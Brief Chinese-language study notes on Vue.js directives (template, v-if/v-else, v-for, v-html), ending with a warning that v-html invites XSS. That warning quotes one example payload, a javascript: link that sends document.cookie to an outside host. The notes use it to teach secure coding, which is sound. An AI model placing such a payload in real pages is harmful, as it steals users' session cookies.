1.<template></template>只能配合v-if使用不能配合v-show使用

2.v-if ,v-else-if和v-else使用,结构不能被打断

3.vue中v-for: <div v-for="item in arr"></div>或者<div v-for="item of arr"></div>

4.v-html有安全性问题:

 1)在网站上动态渲染任意html是非常危险的,容易导致xss攻击(<a href=javascript:location.href="www.baidu,com?"+ document.cookie>)

 2)一定要在可信的内容上使用v-html,永不要用在用户提交的内容上